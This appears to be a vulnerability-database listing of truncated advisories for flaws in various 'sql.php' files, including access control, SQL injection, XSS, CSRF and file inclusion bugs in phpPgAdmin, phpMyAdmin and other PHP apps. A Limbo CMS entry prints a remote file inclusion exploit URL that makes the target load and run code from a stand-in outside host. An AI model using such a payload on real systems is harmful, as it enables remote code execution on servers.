GHSA-R63P-V37Q-G74C phppgadmin contains an incorrect access control vulnerability

phpPgAdmin 7.13.0 and earlier contains an incorrect access control vulnerability in sql.php at lines 68-76. The application allows unauthorized manipulation of session variables by accepting user-controlled parameters 'subject', 'server', 'database', 'queryid' without proper validation or access...

phpPgAdmin 安全漏洞

phpPgAdmin is an open source application of phppgadmin. The premier web-based administration tool for postgresql. A security vulnerability exists in phpPgAdmin 7.13.0 and prior versions, which stems from a lack of proper authentication or access control checks in sql.php and could lead to session...

CVE-2025-60799

phpPgAdmin 7.13.0 and earlier contains an incorrect access control vulnerability in sql.php at lines 68-76. The application allows unauthorized manipulation of session variables by accepting user-controlled parameters 'subject', 'server', 'database', 'queryid' without proper validation or access...

EUVD-2001-0475

Malware in sbrugna...

EUVD-2006-5249

Malware in sbrugna...

EUVD-2001-0474

Malware in sbrugna...

CVE-2024-9918

A vulnerability has been found in HuangDou UTCMS V9 and classified as critical. This vulnerability affects the function RunSql of the file app/modules/ut-data/admin/sql.php. The manipulation of the argument sql leads to sql injection. The attack can be initiated remotely. The exploit has been...

CVE-2024-9918 HuangDou UTCMS sql.php RunSql sql injection

A vulnerability has been found in HuangDou UTCMS V9 and classified as critical. This vulnerability affects the function RunSql of the file app/modules/ut-data/admin/sql.php. The manipulation of the argument sql leads to sql injection. The attack can be initiated remotely. The exploit has been...

SQL Injection

pimcore/pimcore is vulnerable to SQL Injection. The vulnerability exists in Sql.php because the custom report filters are not properly optimized which allows an attacker to inject and execute malicious SQL queries...

SUSE CVE-2006-1803

Cross-site scripting XSS vulnerability in sql.php in phpMyAdmin 2.7.0-pl1 allows remote attackers to inject arbitrary web script or HTML via the sqlquery parameter...

CVE-2018-10188

phpMyAdmin 4.8.0 before 4.8.0-1 has CSRF, allowing an attacker to execute arbitrary SQL statements, related to js/dboperations.js, js/tbloperations.js, libraries/classes/Operations.php, and sql.php...

CVE-2018-10188

phpMyAdmin 4.8.0 before 4.8.0-1 has CSRF, allowing an attacker to execute arbitrary SQL statements, related to js/dboperations.js, js/tbloperations.js, libraries/classes/Operations.php, and sql.php...

MySQLDumper 1.21 SQL.PHP Cross-Site Scripting Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/20460/info MySQLDumper is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting this issue could allow an attacker to execute attacker-supplied script code ...

Limbo CMS <= 1.0.4.2 (sql.php) Remote File Inclusion Vulnerability

漏洞类型： 输入验证错误 影响版本： Limbo CMS Limbo CMS 1.0.4 .2 Limbo CMS Limbo CMS 1.0.4 .1 漏洞成因： 没有过滤用户输入，导致攻击者可以执行远程php文件，从而威胁网站甚至 是服务器 exp： http://www.example.com/classes/adodbt/sql.php?classesdir=http://www.example2.com/cmd.gif?cmd=ls 参考： http://www.securityfocus.com/bid/17760/info Title: Limbo CMS = 1.04...

CVE-2012-4251

The CVE-2012-4251 entry corresponds to multiple XSS vulnerabilities in MySQLDumper 1.24.4. Reported affected vectors include index.php (page param), install.php (phase param), sql.php (tablename or dbid params), and restore.php (filename param) within learn/cubemail/. The connected sources confir...

CVE-2011-2643

Directory traversal vulnerability in sql.php in phpMyAdmin 3.4.x before 3.4.3.2, when configuration storage is enabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in a MIME-type transformation parameter...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in phpMyAdmin 2.10.3 allow remote attackers to inject arbitrary web script or HTML via the 1 unlimnumrows, 2 sqlquery, or 3 pos parameter to a tblexport.php; the 4 sessionmaxrows or 5 pos parameter to b sql.php; the 6 username parameter to c...

Madirish Webmail 2.0 - addressbook.php Remote File Inclusion

Madirish Webmail 2.0 - addressbook.php Remote File Inclusion Madirish Webmail v2.0 Remote File Include Vulnerabilities Author : BoZKuRTSeRDaR Contact MSN:[email protected] My Homepage :WwW.Turkmilliyetcileri.OrG script Download : http://sourceforge.net/projects/madirishwebmail code:...

CVE-2006-6942

Multiple cross-site scripting XSS vulnerabilities in PhpMyAdmin before 2.9.1.1 allow remote attackers to inject arbitrary HTML or web script via 1 a comment for a table name, as exploited through a dboperations.php, 2 the db parameter to b dbcreate.php, 3 the newname parameter to dboperations.php...

CVE-2006-6942

Multiple cross-site scripting XSS vulnerabilities in PhpMyAdmin before 2.9.1.1 allow remote attackers to inject arbitrary HTML or web script via 1 a comment for a table name, as exploited through a dboperations.php, 2 the db parameter to b dbcreate.php, 3 the newname parameter to dboperations.php...